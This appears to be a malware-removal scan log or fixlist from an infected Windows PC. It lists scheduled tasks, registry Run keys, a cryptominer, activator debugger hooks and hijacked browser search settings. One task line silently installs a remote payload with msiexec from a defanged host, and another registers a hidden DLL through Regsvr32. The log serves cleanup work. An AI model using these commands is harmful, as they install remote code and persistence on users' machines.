Task: {08B220ED-CA63-47C0-9B96-D2E786BF8F95} - System32\Tasks\Hmechhebity Engine => C:\Program Files (x86)\Guqasp\xckehither.exe 
Task: {35E3854B-B5D3-40F3-B506-B09AC0377F47} - System32\Tasks\Online Special Application V2G2 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe  <==== ATTENTION
Task: {3FA55C77-A4F6-4C43-9942-AD689BB4982D} - \{0E057A47-0D09-047E-0A11-050E0B7F1105} -> No File <==== ATTENTION
Task: {40DD700B-4A6B-47B3-BCCB-68C47C3E4333} - \Arilile -> No File <==== ATTENTION
Task: {7347C4FD-5AF2-4A9A-92DB-63850708F081} - System32\Tasks\{724FF862-C5E4-4FC9-BE51-5F528FA2872A} => C:\ProgramData\{2B503F68-9CFB-88C3-E447-8D56CAAA9236}\A7C6278E-106D-9025-035E-B160DBE6199D.exe  <==== ATTENTION
Task: {89EEBA59-2405-45B9-BE45-3F9841163E15} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-03-28] ()
Task: {8FEC6B15-A25B-4396-BB08-A9352F283B32} - System32\Tasks\R@1n-KMS\Windows64Professional => wmic 
Task: {95BA9DB4-0939-40A0-9F2E-27B2238AD73A} - System32\Tasks\Online Special Application V2G1 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe  <==== ATTENTION
Task: {9D7C3408-FDCE-4C5D-A262-92319F6F32C6} - System32\Tasks\Updater_Online_Special_Application => C:\Program Files (x86)\Microleaves\Online Special Application\Online Special Application Updater.exe  <==== ATTENTION
Task: {A5EB08BF-A84C-4AC4-B892-591E4D26A10D} - System32\Tasks\Online Special Application V2G3 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe  <==== ATTENTION
Task: {CB64652F-D53B-42F3-8917-068748F6954D} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {DD0ADC35-75A7-4934-871D-CCDF5A376D89} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-03-28] ()
Task: {FFE0E285-252E-477A-AC58-72B9786038E1} - System32\Tasks\{E75C0273-D8D6-D893-53C3-288602D0B879} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\90361a19\aa2c3b22.dll" <==== ATTENTION
Task: C:\Windows\Tasks\Online Special Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Special Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Special Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Updater_Online_Special_Application.job => C:\Program Files (x86)\Microleaves\Online Special Application\Online Special Application Updater.exe <==== ATTENTION
Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Hosts:
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "PWAS4BY1OC4T7L5"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "4FAWBDTDAXQ7DGI"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "isMiner V 1.9"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "BA70O5FIV3OXQ52"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "RV45SKF07USE2PP"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [isMiner V 1.9] => "C:\Users\Zrujnowanyxd9\AppData\Roaming\isMiner\isMiner.exe" -checkforupdates <===== ATTENTION
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [BA70O5FIV3OXQ52] => "C:\Program Files\HYEYHKX74K\UNKDPJ383.exe"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [RV45SKF07USE2PP] => "C:\Program Files\YRYA2O7AI7\YRYA2O7AI.exe"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [4FAWBDTDAXQ7DGI] => "C:\Program Files\G35JLTG9OW\G35JLTG9O.exe"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [PWAS4BY1OC4T7L5] => "C:\Program Files (x86)\PubHotspot\0L26I.exe"
HKU\S-1-5-18\...\Run: [] => [X]
IFEO\OSppSvc.exe: [Debugger] KMS-R@1nHook.exe
IFEO\SppExtComObj.exe: [Debugger] KMS-R@1nHook.exe
ShellExecuteHooks: No Name - {7E69FF54-20E2-11E7-8377-64006A5CFC23} - C:\Users\Zrujnowanyxd9\AppData\Roaming\Rizientqols\Jevosreerwuther.dll -> No File
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\Software\Microsoft\Internet Explorer\Main,Start Page = 
Edge HomeButtonPage: HKU\S-1-5-21-3012374695-455075304-3318307465-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493304631&z=2474c01d7afa64bcfdd74c7g3zbtecfcfefzeqfz4o&from=che0812&uid=TOSHIBAXHDWD110_27QKMLGFSXX27QKMLGFSX
CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3cseoKgOZCfOxi3r1IvpT9T0yYU-_9_QgGmeBWqvu_bzTBlzCcOjsWyFsoNfEtGpdpWTVZCJ4hTMj_558r8T2ucgrwQ4NTPB0GLYob-Of61rJp7eJw_B9XNIOcHhqhvvbWhclF3JsbIfa7f0Y6stfoSJZ-uLV-Bg,
CHR StartupUrls: Default -> "hxxp://www.google.pl/","hxxps://www.facebook.com/","hxxp://www.sony.pl/support/pl/content/cnt-dwnl/prd-comp/win7downgrade_svf_8821","chrome://downloads/","chrome://newtab/","chrome://chrome-signin/?source=0","hxxp://www.ourluckysites.com/?type=hp&ts=1493304631&z=2474c01d7afa64bcfdd74c7g3zbtecfcfefzeqfz4o&from=che0812&uid=TOSHIBAXHDWD110_27QKMLGFSXX27QKMLGFSX"
CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1493304631&z=2474c01d7afa64bcfdd74c7g3zbtecfcfefzeqfz4o&from=che0812&uid=TOSHIBAXHDWD110_27QKMLGFSXX27QKMLGFSX&q={searchTerms}
CHR DefaultSearchKeyword: Default -> ourluckysites
2017-04-27 16:55 - 2017-04-27 16:55 - 00003562 _____ C:\Windows\System32\Tasks\T0528
2017-04-27 16:52 - 2017-04-27 16:53 - 00000000 ____D C:\Users\Zrujnowanyxd9\AppData\LocalLow\Mozilla
2017-04-27 16:52 - 2017-04-27 16:52 - 00002069 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-27 16:52 - 2017-04-27 16:52 - 00001999 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-27 16:52 - 2017-04-27 16:52 - 00000000 ___HD C:\Users\Zrujnowanyxd9\AppData\Local\Everness
2017-04-27 16:51 - 2017-04-27 16:51 - 00000000 ____D C:\ProgramData\Apple
2017-04-27 16:51 - 2017-04-27 16:51 - 00000000 ____D C:\Program Files (x86)\Everness
2017-04-26 15:55 - 2017-04-26 15:55 - 00000000 ____D C:\Windows\psgo
2017-04-26 15:55 - 2017-04-26 15:55 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-26 15:53 - 2017-04-26 21:32 - 00000000 ____D C:\Program Files (x86)\Guqasp
2017-04-16 21:30 - 2017-04-27 19:29 - 00000000 ____D C:\AdwCleaner
2017-04-16 15:05 - 2017-04-27 19:28 - 00000398 _____ C:\Windows\Tasks\Online Special Application V2G3.job
2017-04-16 15:05 - 2017-04-27 19:28 - 00000398 _____ C:\Windows\Tasks\Online Special Application V2G2.job
2017-04-16 15:05 - 2017-04-27 19:28 - 00000398 _____ C:\Windows\Tasks\Online Special Application V2G1.job
2017-04-16 15:05 - 2017-04-27 19:08 - 00000446 _____ C:\Windows\Tasks\Updater_Online_Special_Application.job
2017-04-16 15:05 - 2017-04-16 15:05 - 00003356 _____ C:\Windows\System32\Tasks\Updater_Online_Special_Application
2017-04-16 15:05 - 2017-04-16 15:05 - 00003304 _____ C:\Windows\System32\Tasks\Online Special Application V2G3
2017-04-16 15:05 - 2017-04-16 15:05 - 00003304 _____ C:\Windows\System32\Tasks\Online Special Application V2G2
2017-04-16 15:05 - 2017-04-16 15:05 - 00003304 _____ C:\Windows\System32\Tasks\Online Special Application V2G1
2017-04-16 15:04 - 2017-04-16 15:04 - 00003988 _____ C:\Windows\System32\Tasks\{724FF862-C5E4-4FC9-BE51-5F528FA2872A}
2017-04-16 15:04 - 2017-04-16 15:04 - 00003898 _____ C:\Windows\System32\Tasks\{E75C0273-D8D6-D893-53C3-288602D0B879}
EmptyTemp: